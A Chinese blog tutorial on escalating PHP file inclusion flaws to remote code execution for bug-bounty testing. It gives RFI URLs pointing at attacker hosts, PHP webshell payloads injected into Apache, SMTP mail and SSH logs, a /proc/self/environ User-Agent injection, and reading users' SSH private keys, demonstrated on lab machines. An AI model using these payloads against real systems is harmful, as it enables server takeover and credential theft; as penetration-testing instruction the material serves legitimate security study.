从文件包含到RCE方法

最新推荐文章于 2024-07-02 18:39:58 发布
最新推荐文章于 2024-07-02 18:39:58 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 常见漏洞 文章标签: 本地文件包含 LFI RFI 渗透测试 RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingzhantianxia/article/details/128267652
版权

前言

大家在参加众测的行动时,若是发现了以下基础危害不大的漏洞,不建议直接提交的,而是应该想办法看,能不能对该漏洞进行升级,扩大其危害,多拿点奖励。当然,文件包含不算常见,经常出现在php程序中

远程文件包含(RFI)

http://www.baidu.com/?page=http://hack.com/1.php
http://www.baidu.com/?page=\\attacker.com\shared\mal.php

通过上传

上传任意格式后缀包含shell代码的文件,然后包含该文件即可。

通过apache日志

中间件的日志是及其容易受到文件包含攻击的,例如:可以通过在GET URL时,在参数中填写<?php eval($_GET['a']);?>,这样,恶意内容就会被包含到web日志中,在通过包含该日志,即可成功的进行代码执行。

常见中间件日志位置

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

尝试将恶意代码写入到日志中。

在这里插入图片描述

可以看到,相关内容是有的,只不过是权限过低,无法读取到。

在这里插入图片描述

通过邮件
条件:要求对应的服务器需要开放25端口

1、通过向系统内部用户发送包含<?php echo system($_REQUEST["cmd"]); ?>内容的邮件。
2、包含/var/mail/[usernamme*]&cmd=whoami,就可以成功的执行whoami命令了。

实验过程

  1. 使用telnet 或者nc 直接链接目标主机的25端口

在这里插入图片描述

2.SMTP 协议规定,连接成功后,必须向邮件服务器提供连接的域名,也就是邮件将从哪台服务器发来。使用EHLO命令或者HELO(现在用的较少)

EHLO www.test.com

在这里插入图片描述

发送命令成功,并且列出了smpt 服务支持的扩展

3.使用VRFY 可以验证邮箱是否存在25X的好像都是存在的。
在这里插入图片描述

4.指定发件任何要发送给谁 MAIL FROM 和 RCPT TO

在这里插入图片描述

5.输入DATA 之后进行输入输入,输入完数据进行两次会车,然后输入".",然后再回车,结束输入,邮件发送成功。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ytGDu7wz-1670667731936)(https://note.youdao.com/yws/res/22746/WEBRESOURCE9bf5d8c9379eace439a034276cee029f)]

6.只要文件包含/var/mail/msfadmin,即可成功达成RCE了。

这个时候我们登录实验机器,cat一下这个文件,就可以看到代码确实被输入到这个里面了。

在这里插入图片描述

通过 /proc/self/environ

经过测试,是可行的

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

在这里插入图片描述

通过php session

这个要看具体程序了,需要程序会将失败的用户名等内容写入到php session中。DVWA就不会将失败的内容写入,所以包含也不会成功的。

通过 /proc/*/fd/

就是程序打开的文件,如果打开的某些文件可控的话,可以向其中注入内容,然后包含该文件即可。

例如

/proc/self/fd/3 可以看出来这个是php session 文件,如果可以向session文件中写入内容的话,那么就可以成功包含相关内容了。

在这里插入图片描述

通过ssh

可以通过/proc/self/status 去读到进程的uid和gid,然后读取/etc/password 的内容,知道自己是什么用户,读取用户的登录私钥,如果用户配置了可以通过密钥登录,那么就成了。 /.ssh/ssh_rsa

在这里插入图片描述

在这里插入图片描述

通过其他服务的日志

例如通过ftp、ssh等

读取日志的时候发现可以读取auth.log 尝试向ssh日志中添加恶意代码,然后包含,成功。

在这里插入图片描述

记得输入yes,小问题,小问题
在这里插入图片描述

在这里插入图片描述

以上都是常见的,如果还是无法解决问题,可以参考这个文档中的其他方式

https://book.hacktricks.xyz/pentesting-web/file-inclusion#via-ssh

参考

https://pswalia2u.medium.com/turning-lfi-into-rce-by-sending-emails-via-smtp-58b499a81de3
https://www.sqlsec.com/2017/08/smtp.html#%E7%AE%80%E4%BB%8B
https://pswalia2u.medium.com/turning-lfi-into-rce-by-sending-emails-via-smtp-58b499a81de3
https://book.hacktricks.xyz/pentesting-web/file-inclusion

烟雨醉沉浮
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
蓝凌oa任意文件读取RCE
Dalian0的博客
11-03 4528
蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce 漏洞路径: 1.任意文件读取: /sys/ui/extend/varkind/custom.jsp 漏洞验证: burp抓包修改数据包 修改为post请求,路径如图 数据包 POST /sys/ui.
RCE/文件包含/文件上传基本利用手法
actistsec的博客
10-22 1390
记录RCE/文件上传/文件包含的几种利用
RCE文件包含、CSRF
qq_51780583的博客
03-18 1166
RCE\CSRF\文件包含 的一些使用方法
LInux SSH Server远程代码执行漏洞 (CVE-2024-6387)处理
最新发布
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-02 1344
的函数,最终造成Double-Free内存管理问题。根据已公开技术细节中的描述,在开启ASLR的i386设备上,利用该漏洞大约需要6-8小时获取root shell,在开启ASLR的amd64设备上则可能需要约一周左右。Red Hat Enterprise Linux 9,该缺陷不会影响Red Hat Enterprise Linux 8附带的OpenSSH版本,因其中所涉易受攻击的代码是在上游的较新OpenSSH版本中引入的,且未向后移植到Red Hat Enterprise Linux 8。
【CTFHub】RCE文件包含
m0_63563528的博客
02-03 615
文件包含漏洞的原理及利用、PHP伪协议
任意文件读取rce记录
2401_84434570的博客
05-03 515
尝试了一些常用的手法例如构造报错等均未找到目标,尬住了一会儿后,想到了之前的跨目录上传,既然上传处可以使用../进行跨目录,那么上传后的预览处呢?回头仔细看上传的数据包,发现上传的参数type的值返回在了系统的绝对路径中,猜测type的值即为上传的文件夹,将type改成1尝试,印证了猜想,且是可以直接上传jsp的!上述的情况都是登录后测试的,如果上传点是fuzz出来的,没有目标系统的账号,也可以采取如下几种方案。1.尝试直接上传至系统的静态目录,例如系统自动加载的js文件的目录。
RCE文件包含漏洞
sGanYu
08-17 2169
文件包含 是指编译器进行预处理时复制指定的文件内容代替源文件中预处理命令的过程,一个源文件可以将另一个源文件的全部内容包含进来。初衷是为了减少程序代码的冗余。 文件包含漏洞原理 可以试想一下,开发人员如果每一个代码文件中都要使用到同一段代码,非常繁琐,所以通常会将用到的代码转换成一个文件,让每一个用到它的代码都包含在里面,而无需再次编写。这种调用文件的过程一般被称为包含文件。但由于这种灵活性,从而导致客户端可以调用任意恶意文件,从而造成文件包含漏洞。 文件 PHP 中的文件包含分为本地包含和远.
Apache-Tomcat从文件包含RCE漏洞原理深入分析1
08-03
2020年2月20日,CNVD(中国国家信息安全漏洞库)公开了一个关于Apache Tomcat的文件包含漏洞,该漏洞被标记为CVE-2020-1938。这个漏洞允许攻击者通过特定的输入,包含并执行Tomcat服务器上webapps目录下的任意文件,...
通达OA任意文件上传配合文件包含导致的RCE.md
04-12
通达OA任意文件上传配合文件包含导致的RCE
第52天:代码审计-PHP项目类RCE文件包含下载删除1
08-03
本文主要探讨了PHP项目中常见的安全漏洞类型,包括远程代码执行(RCE)、文件包含、下载、删除等,并提供了相关的漏洞利用关键字和实例分析。 首先,SQL注入是由于不当处理用户输入导致的数据库操作漏洞。关键词如`...
FastAdmin_Upload:FastAdmin 前台文件上传RCE
04-06
《FastAdmin前台文件上传RCE详解及Python利用方法》 FastAdmin是一款基于ThinkPHP5框架开发的后台管理系统,因其简洁易用的界面和强大的功能深受开发者喜爱。然而,任何系统都可能存在安全漏洞,FastAdmin也不例外...
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks 一. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 完成后访问 二. 相关文章 三. 常见 JDK 目录收集 欢迎提 issue 补充:clapping_hands:~ /usr/lib/jvm/java-8-oracle/jre/lib/ /usr/lib/jvm/java-1.8-openjdk/jre/lib/ /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 四. docker 漏洞环境的功能 文件上传功能 (默认上传到 /tmp/ 目录,
redis-rce:Redis RCE 的几种方法
04-15
本文将深入探讨 Redis RCE 的几种方法,并提供防范措施。 一、未授权访问 Redis 默认情况下监听在本地主机上,但如果配置错误,将其暴露在公网,攻击者可以通过网络连接到 Redis 服务器。例如,通过 TCP 监听所有...
【CTFHub】 RCE文件包含
cx_sam的博客
08-07 1668
CTF WEB RCE 文件包含
rce代码及命令执行漏洞与 文件包含
m0_61786761的博客
08-06 595
filename=file:///D:/phpstudy/PHPTutourial/www/1.txt ->file需要完整路径才能执行。③设置访问权限:限制当前中间件所在用户的访问权限,例如;②限制访问区域:php.ini 中设置 open_basedir 来限制用户访问文件的活动范围等;3.参考网址:https://cnblogs.com/lyxsalyd/p/12607769.html。参考:https://www.cnblogs.com/endust/p/11804767.html。...
CTFHub技能书解题笔记-RCE-文件包含
qq_43006864的博客
01-28 3398
打开题目。 他需要一个shell.txt文件。这里尝试点击shell访问一下 看到了一句话。 这里我们直接再/shell.txt 后面进行post传参是没用的。 要进行文件包含,这里我们要将shell.txt进行构造。所以要用到?file=shell.txt。 再进行post传参, 成功传参, 成功拿到flag ...
通达OA未授权上传和文件包含RCE
BROTHERYY的博客
08-20 733
一、漏洞情况 此漏洞是由未授权上传和本地文件包含两个漏洞组合而形成的rce漏洞 文件上传地址: http://localhost:80/ispirit/im/upload.php 本地文件包含地址: http://localhost:80/ispirit/interface/gateway.php 需要复现的朋友私信我,我分享链接给你 安装很简单,一路next就OK。 登录账号是:admin,密码为空。 登录以后,抓取任意数据包,将数据包修改为下面的数据 POST /ispirit/im/upload.ph
RCE远程 代码/命令 执行及文件包含
IMpengyuyan的博客
12-16 531
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而如果,设计者在完成该功能时,没有做严格的安
gitlab任意文件读取漏洞(可能RCE
公众号shadow sock7
04-28 3513
参考: https://hackerone.com/reports/827052 受影响版本下载: https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb wget --content-disposition https://packages.gitlab...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值